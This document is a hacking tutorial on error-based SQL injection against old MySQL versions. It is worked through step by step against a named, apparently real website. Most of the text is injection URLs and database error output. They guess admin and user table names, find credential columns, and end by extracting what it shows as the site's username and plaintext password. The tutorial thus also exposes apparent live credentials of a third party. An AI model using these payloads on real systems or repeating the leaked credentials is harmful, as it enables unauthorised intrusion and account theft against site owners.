SQL INJECTION WHERE THE VERSION IS LESS THAN 5..

SQL INJECTION WHERE THE VERSION IS LESS THAN 5.

Getting Version

Now,lets check the version with error based query.

    +or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1�

Version : Duplicate entry �4.1.22-standard~1' for key 1


Getting Tables

This site don�t have information_schema. The version is less than 5. We have to guess the table names.

This should be our syntax to guess the tables.

    or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)?*2))+having+min(0)+or+1�

Now he we have to guess table name with this syntax. Some tables that usually contains login data :

admin
amdinstator
tbl_admin
tbl_adminstator
login
member
user
users
table_users
settings

Now i�m trying to guess table name with the syntax.

    http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

I tried to guess admin table. There is no table in the database named
admin.

So error came up :

    Table �uhd.admin� doesn�t exist

Lets try to guess another table.

    http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

Again error came up. There is no table in the database named adminstator

So error came up :

    Table �uhd.adminstator� doesn�t exist

Lets try with another table :

    http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

So users table exists.

No error came up :

    Duplicate entry �1~1' for key 1

Getting Columns

Now,we have to guess column name. So syntax to get columns should be like this :

    +or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floo?r(rand(0)*2))+having+min(0)+or+1�

Username is the most common table. Lets try with it.

    http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

Error came up. The column doesn�t exist :(

    Unknown column �username� in �field list�

Lets try to guess another column user_name.

    http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

Now the site loads good. That means user_name exists.

Now try to guess the password column. Lets try with user_pass.

    http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

Extracting data from columns

To get data from columns,our syntax should be this :

    or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�

Some times, this query don�t works,as this query don�t works on this site. We have to use substring.
Getting Username

:

    http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

With this subtrinquery function we can combine a complex question. This query attempts to retrieve the name database of a database table. One character at a time. The substing function will return the first character of query�s result

The username cames up in the query :

    Duplicate entry �root~1' for key 1

Getting Password

:

    http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

Password came up :

    Duplicate entry �trump123~1' for key 1